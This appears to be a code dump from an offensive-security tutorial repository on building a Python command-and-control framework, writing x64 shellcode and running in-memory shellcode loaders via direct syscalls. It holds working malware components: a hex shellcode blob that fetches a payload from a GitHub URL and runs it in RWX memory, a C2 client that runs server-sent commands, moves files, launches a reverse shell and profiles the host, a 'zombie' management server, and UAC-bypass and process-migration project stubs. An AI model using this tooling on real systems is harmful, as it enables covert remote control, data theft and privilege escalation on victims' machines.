4\x50\x48\x89\xe2\x48\x83\xec\x30\x48\x8b\x44\x24\x58\x48\x89\xc6\xff\xd0\x48\x83\xc4\x30\x49\x89\xc7\x48\x31\xc0\x50\x48\x89\xf9\x48\xb8\x4f\x70\x65\x6e\x55\x72\x6c\x41\x50\x48\xb8\x49\x6e\x74\x65\x72\x6e\x65\x74\x50\x48\x89\xe2\x48\x83\xec\x38\xff\xd6\x48\x83\xc4\x30\x49\x89\xc6\x48\x89\xf9\x48\x31\xc0\x50\x48\xb8\x52\x65\x61\x64\x46\x69\x6c\x65\x50\x48\xb8\x49\x6e\x74\x65\x72\x6e\x65\x74\x50\x48\x89\xe2\x48\x83\xec\x38\xff\xd6\x48\x83\xc4\x30\x49\x89\xc5\x48\x89\xf9\xb8\x64\x6c\x65\x90\xc1\xe0\x08\xc1\xe8\x08\x50\x48\xb8\x43\x6c\x6f\x73\x65\x48\x61\x6e\x50\x48\xb8\x49\x6e\x74\x65\x72\x6e\x65\x74\x50\x48\x89\xe2\x48\x83\xec\x38\xff\xd6\x48\x83\xc4\x30\x49\x89\xc4\x48\x31\xd2\xb8\x35\x2e\x30\x90\xc1\xe0\x08\xc1\xe8\x08\x50\x48\xb8\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x50\x48\x89\xe1\xba\x01\x00\x00\x00\x4d\x31\xc0\x4d\x31\xc9\x48\xc7\x44\x24\x20\x00\x00\x00\x00\x48\x83\xec\x30\x41\xff\xd7\x48\x83\xc4\x30\x48\x89\xc7\xb9\x00\x00\x00\x00\xba\x00\x50\x00\x00\x41\xb8\x00\x30\x00\x00\x41\xb9\x04\x00\x00\x00\x48\x83\xc4\x60\x48\x8b\x44\x24\x50\x48\x89\xc6\xff\xd0\x41\x5f\xb9\x00\x00\x00\x00\xba\x00\x01\x00\x00\x41\xb8\x00\x30\x00\x00\x41\xb9\x04\x00\x00\x00\x48\x89\xf0\xff\xd0\x50\x4c\x8b\x4c\x24\x48\x5e\x48\x81\xec\x98\x00\x00\x00\x48\xb8\x65\x67\x2e\x64\x79\x6e\x6f\x90\x48\xc1\xe0\x08\x48\xc1\xe8\x08\x50\x48\xb8\x73\x2f\x6d\x61\x69\x6e\x2f\x72\x50\x48\xb8\x65\x66\x73\x2f\x68\x65\x61\x64\x50\x48\xb8\x61\x72\x2f\x72\x61\x77\x2f\x72\x50\x48\xb8\x65\x72\x74\x68\x65\x72\x61\x64\x50\x48\xb8\x73\x74\x33\x6d\x2f\x75\x6e\x64\x50\x48\xb8\x6f\x6d\x2f\x67\x33\x74\x73\x79\x50\x48\xb8\x67\x69\x74\x68\x75\x62\x2e\x63\x50\x48\xb8\x68\x74\x74\x70\x73\x3a\x2f\x2f\x50\x49\x89\xe0\x48\x89\xf1\x4c\x89\xc2\x4d\x31\xc0\x41\xb8\x47\x00\x00\x00\x41\xff\xd1\x48\x83\xc4\x58\x48\x89\xf9\x48\x89\xf2\x45\x31\xc0\x45\x31\xc9\xc7\x44\x24\x20\x00\x00\x00\x04\x48\xc7\x44\x24\x28\x00\x00\x00\x00\x41\xff\xd6\x48\x83\xc4\x28\x50\x48\x8b\x34\x24\x48\x8b\x0c\x24\x4c\x89\xfa\x41\xb8\x00\x10\x00\x00\x4c\x8d\x4c\x24\xd0\x48\x31\xc0\x41\xff\xd5\x85\xc0\x74\x11\x83\x7c\x24\xd0\x00\x76\x0a\x8b\x4c\x24\xd0\x89\x4c\x24\xc0\xeb\xd3\x48\x89\xf1\x41\xff\xd4\x48\x89\xf9\x41\xff\xd4\xb9\x00\x00\x00\x00\xba\x00\x50\x00\x00\x41\xb8\x00\x30\x00\x00\x41\xb9\x40\x00\x00\x00\x48\x8b\x84\x24\xb0\x00\x00\x00\xff\xd0\x50\x59\x4c\x89\xfa\x41\xb8\xe8\x03\x00\x00\x48\x8b\x84\x24\xa8\x00\x00\x00\xff\xd0\x50\x48\x31\xc9\x48\x31\xd2\x41\x58\x4d\x31\xc9\xc7\x44\x24\x20\x00\x00\x00\x00\x48\xc7\x44\x24\x28\x00\x00\x00\x00\x48\x8b\x84\x24\x88\x00\x00\x00\xff\xd0\x48\x89\xc1\xba\xff\xff\xff\xff\x48\x8b\x9c\x24\xc8\x00\x00\x00\xff\xd3\x31\xc9\x48\x8b\x84\x24\x90\x00\x00\x00\xff\xd0";
41 |
42 | PVOID baseAddress = nullptr;
43 | SIZE_T size = sizeof(shellcode);
44 |
45 | NTSTATUS status = pNtAllocate(GetCurrentProcess(), &baseAddress, 0, &size,
46 | MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
47 | if (status != 0) {
48 | std::cerr << "[-] NtAllocateVirtualMemory failed. Error code: 0x" << std::hex << status << "\n";
49 | return -1;
50 | }
51 | std::cout << "[+] Memory allocated at " << baseAddress << "\n";
52 |
53 | SIZE_T bytesWritten = 0;
54 | status = pNtWrite(GetCurrentProcess(), baseAddress, shellcode, sizeof(shellcode), &bytesWritten);
55 | if (status != 0) {
56 | std::cerr << "[-] NtWriteVirtualMemory failed. Error code: 0x" << std::hex << status << "\n";
57 | return -1;
58 | }
59 | std::cout << "[+] Wrote " << bytesWritten << " bytes of shellcode.\n";
60 |
61 | HANDLE hThread = nullptr;
62 | status = pNtCreate(&hThread, THREAD_ALL_ACCESS, nullptr, GetCurrentProcess(),
63 | (PVOID)baseAddress, nullptr, FALSE, 0, 0, 0, nullptr);
64 | if (status != 0) {
65 | std::cerr << "[-] NtCreateThreadEx failed. Error code: 0x" << std::hex << status << "\n";
66 | return -1;
67 | }
68 |
69 | std::cout << "[+] Thread created! Waiting for execution...\n";
70 | WaitForSingleObject(hThread, INFINITE);
71 |
72 | return 0;
73 | }
74 |
--------------------------------------------------------------------------------
/2024-11-27-Create your own C2 using Python- Part 2/c2client_part2.py:
--------------------------------------------------------------------------------
1 | import signal
2 | import argparse
3 | import socket
4 | import subprocess
5 | import sys
6 | import threading
7 | import os
8 | import psutil
9 | import time
10 | from win32com.shell import shell
11 | exit_event = threading.Event()
12 |
13 | #def startrevshellsvr():
14 | # subprocess.call(["python", "pyrevshell_server.py"])
15 | # exit_event.set()
16 | def startrevshellcli():
17 | subprocess.call("py C:/Users/public/pyrevshell_client.py")
18 | exit_event.set()
19 |
20 | def recfile(filepath,filesize):
21 | filesize=int(filesize)
22 | with open(filepath, 'wb') as f:
23 | received = 0
24 | while received < filesize:
25 | data = client.recv(4096)
26 | if not data:
27 | break
28 | if not "?keepalive?" in data.decode("UTF-8", errors="ignore"):
29 | f.write(data)
30 | received += len(data)
31 | print(f"Saved: {filepath}")
32 | exit_event.set()
33 |
34 | def receiver(client):
35 | UPLOAD_DIR = 'c:/users/public/uploads'
36 | while True:
37 | try:
38 | data=client.recv(1024)
39 | except:
40 | print("server must have died...time to hop off")
41 | client.close()
42 | os._exit(0)
43 | data=data.decode('UTF-8')
44 | #print(data)
45 |
46 | if ":msg:" in data:
47 | print(data)
48 | if ":whoami:" in data:
49 | whoami=os.getlogin()
50 | client.send(whoami.encode())
51 |
52 | if ":shell:" in data:
53 | exit_event.clear()
54 | #handler_thread = threading.Thread(target=startrevshellsvr)
55 | #handler_thread.daemon = True
56 | #handler_thread.start()
57 |
58 | handler_thread2 = threading.Thread(target=startrevshellcli)
59 | handler_thread2.daemon = True
60 | handler_thread2.start()
61 | while not exit_event.is_set():
62 | time.sleep(1)
63 | if ":upload:" in data:
64 | client.send(b"***Ready for upload to begin***!!\n")
65 | print(data.split(":"))
66 | data=data.split(":")
67 | filename=data[2]
68 | filesize=data[3]
69 | filepath = UPLOAD_DIR + "/" + filename
70 | print(filepath)
71 |
72 | exit_event.clear()
73 | handler_thread3 = threading.Thread(target=recfile, args=(filepath,filesize))
74 | handler_thread3.daemon = True
75 | handler_thread3.start()
76 | while not exit_event.is_set():
77 | time.sleep(1)
78 | client.send(b"File successfully uploaded!\n")
79 | if "~download~" in data:
80 | print(data.split("~"))
81 | data=data.split("~")
82 | filepath = data[2]
83 | print(filepath)
84 | time.sleep(3)
85 |
86 | if not os.path.isfile(filepath):
87 | print(f"Error: File '{filepath}' does not exist.")
88 | return
89 | filename = os.path.basename(filepath)
90 | print(filename)
91 | filesize = os.path.getsize(filepath)
92 | filesize=str(filesize)
93 | print(filesize)
94 | client.send(filesize.encode())
95 | with open(filepath, 'rb') as f:
96 | for chunk in iter(lambda: f.read(4096), b''):
97 | client.sendall(chunk)
98 |
99 |
100 | #client.send(b"file sent!\n")
101 | time.sleep(3)
102 | if "c0mm@nd" in data:
103 | command=data.split("\n")
104 | command=command[1]
105 | print("command: ", command)
106 | proc = subprocess.Popen(command,
107 | stdin=subprocess.PIPE,
108 | stdout=subprocess.PIPE,
109 | stderr=subprocess.PIPE)
110 | #print(proc.stdout.read().decode())
111 | output=proc.stdout.read().decode().strip()
112 | #print(output)
113 | output=output.encode()
114 | proc.stdin.close()
115 | proc.terminate()
116 |
117 | client.sendall(b"returned output: \n"+output+b"\n:endofoutput:\n")
118 |
119 |
120 |
121 | if "self-destruct" in data:
122 | client.close()
123 | os._exit(0)
124 |
125 | host="127.0.0.1"
126 | port=4545
127 | breaktheloop=False
128 |
129 | OnADomain="False"
130 | LocalAdmin="False"
131 | #systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
132 | osinfo=subprocess.run("powershell.exe -command Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version | findstr Microsoft", capture_output=True, text=True)
133 | osinfo=osinfo.stdout.strip()
134 | #print(osinfo)
135 | UPLOAD_DIR = 'c:/users/public/uploads'
136 | os.makedirs(UPLOAD_DIR, exist_ok=True)
137 |
138 | try:
139 | ipaddrinfo=subprocess.run("powershell.exe -command (Get-NetIPAddress -AddressFamily IPv4).IpAddress | findstr /V 169. | findstr /V 127.0.0.1", capture_output=True, text=True)
140 | ipaddrinfo=ipaddrinfo.stdout.strip()
141 | except:
142 | ipaddrinfo="No IP addresses active on system"
143 | try:
144 | domaininfo=subprocess.run("whoami /FQDN", capture_output=True, text=True)
145 | if "Unable" in domaininfo.stderr:
146 | OnADomain="False"
147 | print("[-] NOT domain joined")
148 | else:
149 | print("[+] domain joined!")
150 | OnADomain="True"
151 | except:
152 | print("[!] unexpected error...")
153 | gathering=subprocess.run("net user " + os.environ.get('USERNAME'), capture_output=True, text=True)
154 | if "Administrators" in gathering.stdout:
155 | print("[+] members of local admins!")
156 | LocalAdmin="True"
157 |
158 | if OnADomain == "True":
159 | info=os.environ["userdomain"] + "\\" + os.getlogin() + "\n[Elevated]: " + str(shell.IsUserAnAdmin()) + "\nMember of Local Admins: " + LocalAdmin + "\n" + "Domain Joined: " + OnADomain + "\n" + "Domain Info: " + domaininfo.stdout + "\n" + "OS info: " + osinfo + "\n" + "IP address info: " + "\n" + ipaddrinfo
160 | else:
161 | info=os.environ.get('COMPUTERNAME') + "\\" + os.getlogin() + "\n[Elevated]: " + str(shell.IsUserAnAdmin()) + "\nMember of Local Admins: " + LocalAdmin + "\n" + "Domain Joined: " + OnADomain + "\n" + "OS info: " + osinfo +"\n" + "IP address info: " + "\n" + ipaddrinfo
162 |
163 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
164 | client.connect((host, port))
165 | client.send(info.encode('UTF-8'))
166 | #data=client.recv(1024)
167 | #print(data.decode('UTF-8'))
168 |
169 | handler_thread = threading.Thread(target=receiver, args=(client, ))
170 | handler_thread.daemon=True
171 | handler_thread.start()
172 |
173 | while True:
174 | time.sleep(1)
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/migrator2/migrator2.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 17.0
23 | Win32Proj
24 | {b230569f-1967-4c23-a401-28a2993eeb4a}
25 | migrator2
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 |
122 |
123 | Console
124 | true
125 | true
126 | true
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/UIAccess_bypassUAC/UIAccess_bypassUAC.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 17.0
23 | Win32Proj
24 | {8c4ef514-988d-4ed8-a44d-d376f300e35b}
25 | UIAccessbypassUAC
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 |
122 |
123 | Console
124 | true
125 | true
126 | true
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/migrator/migrator.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {91b67bc2-78b4-4b06-aec8-bcb6c1a9454f}
25 | migrator
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 |
122 |
123 | Console
124 | true
125 | true
126 | true
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
--------------------------------------------------------------------------------
/2024-11-10-x64 Assembly & Shellcoding 101 - Part 5/msgbox.asm:
--------------------------------------------------------------------------------
1 | ;nasm -fwin64 [x64findkernel32.asm]
2 | ;ld -m i386pep -o x64findkernel32.exe x64findkernel32.obj
3 | BITS 64
4 | SECTION .text
5 | global main
6 | main:
7 | sub rsp, 0x28
8 | and rsp, 0xFFFFFFFFFFFFFFF0
9 | xor rcx, rcx ; RCX = 0
10 | mov rax, [gs:rcx + 0x60] ; RAX = PEB
11 | mov rax, [rax + 0x18] ; RAX = PEB->Ldr
12 | mov rsi,[rax+0x10] ; PEB.Ldr->InMemOrderModuleList
13 | mov rsi, [rsi]
14 | mov rsi,[rsi]
15 | mov rbx, [rsi+0x30] ; kernel32.dll base address
16 | mov r8, rbx ; mov kernel32.dll base addr into r8
17 | mov ebx, [rbx+0x3C] ; Get Kernel32 PE Signature (offset 0x3C) into EBX
18 | add rbx, r8 ; Add signature offset to kernel32 base. Store in RBX.
19 | xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
20 | add cx, 0x88ff ; cx is the lower 16 bit portion of ecx (32 bit), and rcx is 64 bit.
21 | shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
22 | mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
23 | add rdx, r8 ; RDX = kernel32.dll + RVA ExportTable = ExportTable Address
24 | mov r10d, [rdx+0x14] ; Number of functions
25 | xor r11, r11 ; Zero R11 before use
26 | mov r11d, [rdx+0x20] ; AddressOfNames RVA
27 | add r11, r8 ; AddressOfNames VMA
28 | mov rcx, r10 ; store number of functions for future use
29 | mov rax, 0x9090737365726464 ; 'ddress'
30 | shl rax, 0x10 ; 7373657264640000
31 | shr rax, 0x10 ; 0000737365726464 terminate our string w/ no nulls present in our shellcode!
32 | push rax
33 | mov rax, 0x41636F7250746547 ; 'GetProcA '
34 | push rax
35 | mov rax, rsp
36 | kernel32findfunction: ; Loop over Export Address Table to find WinApi names
37 | jecxz FunctionNameNotFound ; Loop around this function until we find WinExec
38 | xor ebx,ebx ; Zero EBX for use
39 | mov ebx, [r11+rcx*4] ; EBX = RVA for first AddressOfName
40 | add rbx, r8 ; RBX = Function name VMA / add kernel32 base address to RVA and get WinApi name
41 | dec rcx ; Decrement our loop by one, this goes from Z to A
42 | ; Load first 8 bytes of "LoadLibrary"
43 | mov r9, qword [rax] ; R9 = "GetProcA"
44 | cmp [rbx], r9 ; Compare first 8 bytes
45 | jnz kernel32findfunction ; If not equal, continue loop
46 | ; Check next part for "aryA" (4 bytes)
47 | mov r9d, dword [rax + 8] ; R9 = "ddress"
48 | cmp [rbx + 8], r9d ; Compare remaining part
49 | jz FunctionNameFound ; If match, function found
50 | jnz kernel32findfunction
51 | FunctionNameNotFound:
52 | int3
53 | FunctionNameFound:
54 | push rcx
55 | pop r15 ;getprocaddress position
56 | inc r15
57 | xor r11, r11
58 | mov r11d, [rdx+0x1c] ; AddressOfFunctions RVA
59 | add r11, r8 ; AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
60 | mov eax, [r11+r15*4] ; Get the function RVA.
61 | add rax, r8 ; Found the GetProcAddress WinApi!!!
62 | push rax ; push GetProcAddress temporarily to be used by next segment
63 | ; Prepare arguments for getting handle to LoadLibraryA:
64 | pop r15 ; temporary use
65 | mov r12, r15 ; save copy of GetProcAddress for future use
66 | mov rdi, r8 ; make a copy of kernel32 base address for future use
67 | mov rcx, r8 ; RCX = handle to kernel32.dll (first argument)
68 | ; Load "LoadLibraryA" onto the stack
69 | mov rax, 0x41797261 ; aryA, 0 (include null byte)
70 | push rax
71 | mov rax, 0x7262694C64616F4C ; LoadLibr
72 | push rax
73 | mov rdx, rsp ; RDX points to "LoadLibraryA" (second argument)
74 | sub rsp, 0x30 ; decimal 48 ( 3 x 16 bytes)
75 | call r15 ; Call GetProcAddress
76 | add rsp, 0x30
77 | mov r15, rax ;holds LoadLibraryA!
78 | ;getexitprocess
79 | mov r14, r12 ;temporary assignment of GetProcess handle
80 | mov rcx, rdi ; RCX = handle to kernel32.dll (first argument)
81 | ; Load "ExitProcess" onto the stack
82 | mov rax, 0x90737365 ; 'ess'
83 | shl eax, 0x8 ; 0000000073736500
84 | shr eax, 0x8 ; 0000000000737365 terminate our string w/ no nulls present in our shellcode!
85 | push rax
86 | mov rax, 0x636F725074697845 ; ExitProc
87 | push rax
88 | mov rdx, rsp ; RDX points to "ExitProcess" (second argument)
89 | sub rsp, 0x30
90 | call r14 ; Call GetProcAddress
91 | add rsp, 0x30
92 | mov r14, rax ; holds ExitProcess!
93 | ;locate user32.dll
94 | mov rax, 0x90906C6C ; add "ll" string to RAX
95 | shl eax, 0x10 ; 000000006C6C0000
96 | shr eax, 0x10 ; 0000000000006C6C
97 | push rax ; push RAX to stack
98 | mov rax, 0x642E323372657375 ; Add "user32.d" string to RAX.
99 | push rax ; Push RAX to stack
100 | mov rcx, rsp ; Move a pointer to User32.dll into RCX.
101 | sub rsp, 0x30
102 | call r15 ; Call LoadLibraryA("user32.dll")
103 | mov rdi, rax ; holds User32.dll address
104 | ; Prepare arguments for GetProcAddress for MessageBoxA:
105 | mov rcx, rdi ; RCX = handle to user32.dll (first argument)
106 | mov rax, 0x9041786F ; Load "oxA" into RAX
107 | shl eax, 0x8 ; 0000000041786F00
108 | shr eax, 0x8 ; 000000000041786F
109 | push rax
110 | mov rax, 0x426567617373654D ; Load "MessageB" into RAX
111 | push rax
112 | mov rdx, rsp ; RDX points to "MessageBoxA" (second argument)
113 | sub rsp, 0x30
114 | call r12 ; Call GetProcAddress
115 | mov r15, rax ; store MessageBoxA
116 | ;messageboxfinally:
117 | xor rcx, rcx ; hWnd = NULL (no owner window)
118 | mov rax, 0x9090906D ; m, 0
119 | shl eax, 24 ; 000000006D000000
120 | shr eax, 24 ; 000000000000006D
121 | push rax
122 | mov rax, 0x3374737973743367 ;g3tsyst3
123 | push rax
124 | mov rdx, rsp ; lpText = pointer to message
125 | mov r8, rsp ; lpCaption = pointer to title
126 | xor r9d, r9d ; uType = MB_OK (OK button only)
127 | sub rsp, 0x30
128 | call r15 ; Call MessageBoxA
129 | add rsp, 0x30
130 | ;exitcleanly:
131 | xor ecx, ecx
132 | call r14 ;ExitProcess
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/elevationstation/elevationstation.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {c5f1c8ee-8d2b-4dca-b057-d4191bf9e36b}
25 | elevationstation
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | false
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 |
122 |
123 | Console
124 | true
125 | true
126 | false
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
--------------------------------------------------------------------------------
/2025-8-23-Using Direct Syscalls with an In-Memory PIC Shellcode Loader/syscall_mayhem_6/syscall_mayhem_6.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 17.0
23 | Win32Proj
24 | {91d02323-e2d3-4efa-b329-f7715004e33d}
25 | syscallmayhem6
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 |
122 |
123 | Console
124 | true
125 | true
126 | true
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
--------------------------------------------------------------------------------
/2024-11-22-Create your own C2 using Python- Part 1.md/c2server_part1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import subprocess
3 | import sys
4 | import time
5 | import threading
6 | import asyncio
7 | import io
8 | import os
9 | import psutil
10 | #from win32com.shell import shell
11 |
12 | #import readline
13 | import colorama
14 | from colorama import Fore, Back, Style
15 | exit_event = threading.Event()
16 |
17 | counter=-1
18 | clientlist=[]
19 | clientdata=[]
20 | automigrate=""
21 |
22 | def startrevshellsvr():
23 | if os.name == 'nt':
24 | subprocess.call(["py", "pyrevshell_server.py"])
25 | exit_event.set()
26 | else:
27 | subprocess.call(["python3", "pyrevshell_server.py"])
28 | exit_event.set()
29 | #def startrevshellcli():
30 | # subprocess.call(["python", "pyrevshell_client.py"])
31 | # exit_event.set()
32 |
33 |
34 | def probe():
35 | while True:
36 | global counter
37 | global clientlist
38 | global clientdata
39 |
40 | ############################################################
41 | # are any not alive anymore? do a keep-alive probe to see...
42 | ############################################################
43 | try:
44 | d = 0
45 | for c in range(len(clientlist)):
46 | clientlist[c][1].send(b"?keepalive?\n")
47 | d = d + 1
48 | except:
49 | print(Fore.YELLOW + "\nThis Zombie died:\n************************\n" + Fore.WHITE, counter, "--> ", clientdata[d], "\n************************\n")
50 | clientlist.pop(d)
51 | clientdata.pop(d)
52 | counter = counter - 1
53 | print(Fore.GREEN + "[+] removed \"dead\" zombie ;) " + Fore.WHITE)
54 | time.sleep(4)
55 |
56 | def zombies():
57 | global counter
58 | global clientlist
59 | global clientdata
60 | selection=""
61 |
62 | if (len(clientlist)) <= 0:
63 | print(Fore.RED + "[!] no zombies yet..." + Fore.WHITE)
64 | return
65 |
66 | print(Fore.GREEN + "Zombies: ", len(clientlist), Fore.WHITE)
67 |
68 | temp=0
69 | for b in clientdata:
70 | print("Zombie: ", temp, "-->", b)
71 | temp+=1
72 | print(Fore.GREEN + "\nPick a zombie to interact with!\n" + Fore.WHITE)
73 | try:
74 | selection=int(input(' $ '))
75 | except:
76 | print(Fore.RED + "[!] enter client number..." + Fore.WHITE)
77 | time.sleep(2)
78 | return
79 |
80 | while True:
81 | if os.name == 'nt':
82 | os.system("cls")
83 | else:
84 | os.system("clear")
85 | print(Fore.GREEN)
86 | print("what would you like to do?")
87 | print("1. Send a Message")
88 | print("2. Get user info")
89 | print("3. Get public ip")
90 | print("4. Kill Zombie")
91 | print("5. Start a Shell!")
92 | print("6. Whoami")
93 | """
94 | =============================================
95 | Preview of what's to come :) get pumped!!!!
96 | =============================================
97 | print("7. GetSyst3m!!!")
98 | print("8. BypassUAC")
99 | print("9. Migrate Process")
100 | """
101 | print("15. Main menu")
102 | print(Fore.WHITE)
103 | try:
104 | choice=input(Fore.YELLOW + "[Select a number]: $ " + Fore.WHITE)
105 | except:
106 | print(Fore.RED + "[!] enter a number..." + Fore.WHITE)
107 | time.sleep(2)
108 | return
109 | if choice == "1":
110 | try:
111 | clientlist[selection][1].send(b":msg:\nhey from the server!\n")
